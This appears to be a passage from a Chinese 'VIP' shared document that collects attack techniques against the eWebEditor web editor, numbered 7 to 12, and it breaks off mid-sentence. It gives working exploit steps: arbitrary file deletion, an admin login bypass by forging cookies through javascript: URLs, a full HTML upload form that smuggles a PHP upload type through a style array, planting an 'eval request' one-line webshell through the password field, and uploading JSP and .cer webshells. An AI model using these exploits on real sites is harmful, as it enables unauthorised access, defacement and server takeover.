编辑器漏洞合集.docVIP

ewebeditor：7、eWebEditor2.8.0最终版删除任意文件漏洞：此漏洞存在于Example\NewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入。EXP:删除文件漏洞一般是配合其他漏洞使用的，比如目录遍历！8、PHP ≥ 3.0~3.8与asp 2.8版 PHP/ASP…后台通杀漏洞：进入后台/eWebEditor/admin/login.php,随便输入一个用户和密码,会提示出错了.这时候你清空浏览器的url,然后输入javascript:alert(document.cookie=adminuser=+escape(admin));javascript:alert(document.cookie=adminpass=+escape(admin));javascript:alert(document.cookie=admindj=+escape(1));而后三次回车,清空浏览器的URL,现在输入一些平常访问不到的文件如../ewebeditor/admin/default.php，就会直接进去。9、ewebeditor php v3.8 or older version任意文件上传漏洞：此版本将所有的风格配置信息保存为一个数组$aStyle,在php.ini配置register_global为on的情况下我们可以任意添加自己喜欢的风格，并定义上传类型。攻击利用:EXP:form action= method=post enctype=multipart/form-data INPUT TYPE=hidden name=MAX_FILE_SIZE value=512000 URL:input type=text name=url value=10/eWebEditor/ size=100br INPUT TYPE=hidden name=aStyle[12] value=toby57|||gray|||red|||../uploadfile /|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh- cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋 体||||||0|||jpg|jpeg|||300|||FFFFFF|||1 file:input type=file name=uploadfilebr input type=button value=submit onclick=fsubmit() /formbr script function fsubmit(){ form = document.forms[0]; form.action = form.url.value+php/upload.php?action=savetype=FILEstyle=toby57language=en; alert(form.action); form.submit(); } /script10、eWebEditor 2.8 商业版插一句话木马：登陆后台，点击修改密码---新密码设置为??1:eval request(h)’设置成功后，访问asp/config.asp文件即可，一句话木马被写入到这个文件里面了.11、ewebeditor jsp 1.4以下版本上传漏洞：第一个是使用savefile.jsp来进行文件上传操作.直接上传一个JSPShell另一个版本可能是被人修改过，把代码转成了servlet，不能看到代码， 但是利用方法却大同小异。我们先找一个1.4版本以下的ewebeditor JSP上传页面，选择好一个JSPShell。这个ewebeditor是没有提交按钮的，所以这里涉及到一个小技巧，就是在上传的对话框中敲下回车，大 约过半分钟，就可以查看网页的源文件找webshell地址。12、eWebEditorNet upload.aspx 上传漏洞：WebEditorNet 主要是一个upload.aspx文件存在上传漏洞。攻击利用默认上传地址：/ewebeditornet/upload.aspx 可以直接上传一个cer的